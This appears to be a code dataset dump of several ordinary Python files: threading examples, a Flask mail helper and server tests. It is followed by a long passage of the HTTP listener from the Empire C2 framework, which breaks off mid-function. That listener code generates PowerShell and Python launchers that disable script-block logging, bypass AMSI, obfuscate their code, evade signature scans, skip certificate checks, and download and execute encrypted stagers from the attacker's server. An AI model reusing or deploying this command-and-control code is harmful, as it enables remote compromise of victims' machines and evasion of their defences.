source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
threading_daemon_join.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Joining daemon threads to prevent premature exit.
"""
#end_pymotw_header
import threading
import time
import logging
def daemon():
logging.debug('Starting')
time.sleep(0.2)
logging.debug('Exiting')
def non_daemon():
logging.debug('Starting')
logging.debug('Exiting')
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
d = threading.Thread(name='daemon', target=daemon, daemon=True)
t = threading.Thread(name='non-daemon', target=non_daemon)
d.start()
t.start()
d.join()
t.join()
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
import os
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
def email_me(name, subject, email, message):
msg = Message(subject, sender=email, recipients=[ os.environ.get('FLASKY_ADMIN')])
msg.body = """
From: %s @ %s;
%s
""" % (name, email, message)
mail.send(msg)
|
test_server_basic.py
|
import subprocess
import requests
import time
import re
import signal
import os
import traceback
from threading import Thread
from time import sleep
__this_dir__ = os.path.join(os.path.abspath(os.path.dirname(__file__)))
class DispatcherServer(object):
def __init__(self):
pass
url=None
def follow_output(self):
url=None
for line in iter(self.process.stdout.readline,''):
print "following server:",line.rstrip()
m=re.search("Running on (.*?) \(Press CTRL\+C to quit\)",line)
if m:
url=m.group(1) # alaternatively get from configenv
print("found url:",url)
if re.search("\* Debugger PIN:.*?",line):
print("server ready")
url=url.replace("0.0.0.0","127.0.0.1")
self.url=url
def start(self):
cmd=["python",__this_dir__+"/../bin/run_osa_cdci_server.py"]
print("command:"," ".join(cmd))
self.process=subprocess.Popen(cmd,stdout=subprocess.PIPE, stderr=subprocess.STDOUT,shell=False)
print("\n\nfollowing server startup")
thread = Thread(target = self.follow_output, args = ())
thread.start()
while self.url is None:
time.sleep(0.1)
time.sleep(0.5)
self.url="http://127.0.0.1:5000"
return self
def stop(self):
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
def __enter__(self):
return self.start()
def __exit__(self, _type, value, tracebac):
print("exiting:",_type,value, tracebac)
traceback.print_tb(tracebac)
time.sleep(0.5)
self.stop()
def test_urltest():
with DispatcherServer() as server:
print server
c=requests.get(server.url+"/test",params=dict(
image_type="Real",
product_type="image",
E1=20.,
E2=40.,
T1="2008-01-01T11:11:11.0",
T2="2008-06-01T11:11:11.0",
))
jdata=c.json()
print('done')
print jdata.keys()
print jdata['data']
test_urltest()
|
test_gateway.py
|
import functools
import time
from threading import Thread
import numpy as np
import pytest
from jina import Document, Client, Flow
from jina.enums import CompressAlgo
from tests import random_docs
@pytest.mark.slow
@pytest.mark.parametrize('compress_algo', list(CompressAlgo))
def test_compression(compress_algo, mocker):
response_mock = mocker.Mock()
f = Flow(compress=str(compress_algo)).add().add(name='DummyEncoder', shards=2).add()
with f:
f.index(random_docs(10), on_done=response_mock)
response_mock.assert_called()
@pytest.mark.slow
@pytest.mark.parametrize('protocol', ['websocket', 'grpc', 'http'])
def test_gateway_concurrency(protocol):
PORT_EXPOSE = 12345
CONCURRENCY = 2
threads = []
status_codes = [None] * CONCURRENCY
durations = [None] * CONCURRENCY
def _validate(req, start, status_codes, durations, index):
end = time.time()
durations[index] = end - start
status_codes[index] = req.status.code
def _request(status_codes, durations, index):
start = time.time()
Client(port=PORT_EXPOSE, protocol=protocol).index(
inputs=(Document() for _ in range(256)),
on_done=functools.partial(
_validate,
start=start,
status_codes=status_codes,
durations=durations,
index=index,
),
batch_size=16,
)
f = Flow(protocol=protocol, port_expose=PORT_EXPOSE).add(parallel=2)
with f:
threads = []
status_codes = [None] * CONCURRENCY
durations = [None] * CONCURRENCY
for i in range(CONCURRENCY):
t = Thread(target=_request, args=(status_codes, durations, i))
threads.append(t)
t.start()
for t in threads:
t.join()
success = status_codes.count(0)
failed = len(status_codes) - success
print(
f'clients: {len(durations)}\n'
f'min roundtrip time: {np.min(durations)}\n'
f'max roundtrip time: {np.max(durations)}\n'
f'mean roundtrip time: {np.mean(durations)}\n'
)
assert success >= 1
# In some slow environments, a certain degree of failed
# requests will occur. Here we limit the degree of failed
# requests.
rate = failed / success
assert rate < 0.1
|
directory_monitor.py
|
import threading
from typing import Dict
import os
import time
class DirectoryMonitor():
def __init__(self, *, directory_path: str, include_subdirectories: bool, delay_between_checks_seconds: float):
self.__directory_path = directory_path
self.__include_subdirectories = include_subdirectories
self.__delay_between_checks_seconds = delay_between_checks_seconds
self.__monitor_thread = None # type: threading.Thread
self.__monitor_thread_semaphore = threading.Semaphore()
self.__is_monitor_thread_running = False
self.__wait_semaphore = threading.Semaphore()
def start(self):
self.__monitor_thread_semaphore.acquire()
if self.__is_monitor_thread_running:
self.__monitor_thread_semaphore.release()
raise Exception(f"Cannot begin monitoring without first starting.")
else:
self.__is_monitor_thread_running = True
self.__monitor_thread = threading.Thread(target=self.__monitor_thread_method)
self.__wait_semaphore.acquire()
self.__monitor_thread.start()
self.__monitor_thread_semaphore.release()
def wait(self):
self.__wait_semaphore.acquire()
self.__wait_semaphore.release()
def __monitor_thread_method(self):
_previous_file_sizes_per_file_path = {} # type: Dict[str, int]
while self.__is_monitor_thread_running:
_is_new_file_discovered = False
_is_existing_file_size_different = False
_is_file_missing = False
if self.__directory_path not in _previous_file_sizes_per_file_path.keys():
_is_new_file_discovered = True
_current_file_sizes_per_file_path = {
self.__directory_path: None
} # type: Dict[str, int]
_pending_directories = [
self.__directory_path
]
while len(_pending_directories) != 0:
_directory_path = _pending_directories.pop(0)
for _file_name in os.listdir(_directory_path):
_file_path = os.path.join(_directory_path, _file_name)
if os.path.isdir(_file_path):
_is_file = False
_file_size = None
else:
_is_file = True
_file_size = os.stat(_file_path).st_size
if _file_path not in _previous_file_sizes_per_file_path.keys():
_is_new_file_discovered = True
elif _is_file and _previous_file_sizes_per_file_path[_file_path] != _file_size:
_is_existing_file_size_different = True
_current_file_sizes_per_file_path[_file_path] = _file_size
if not _is_file and self.__include_subdirectories:
_pending_directories.append(_file_path)
for _file_path in _previous_file_sizes_per_file_path:
if _file_path not in _current_file_sizes_per_file_path.keys():
_is_file_missing = True
break
if _is_new_file_discovered or _is_existing_file_size_different or _is_file_missing:
_previous_file_sizes_per_file_path = _current_file_sizes_per_file_path
_current_file_sizes_per_file_path = None
time.sleep(self.__delay_between_checks_seconds)
else:
self.__wait_semaphore.release()
self.__is_monitor_thread_running = False
|
http.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import obfuscation
from lib.common import packets
from lib.common import templating
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
self.session_cookie = ''
# check if the current session cookie not empty and then generate random cookie
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
# this might not be necessary. Could probably be achieved by just callingg mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file
def get_db_connection(self):
"""
Returns the cursor for SQLlite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization(
'$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request as urllib;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
stager = helpers.keyword_obfuscation(stager)
self.lock.release()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any conditions in which the encrypt flag isn't set so the other
# if/else statements are irrelevant
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
code = helpers.keyword_obfuscation(code)
self.lock.release()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
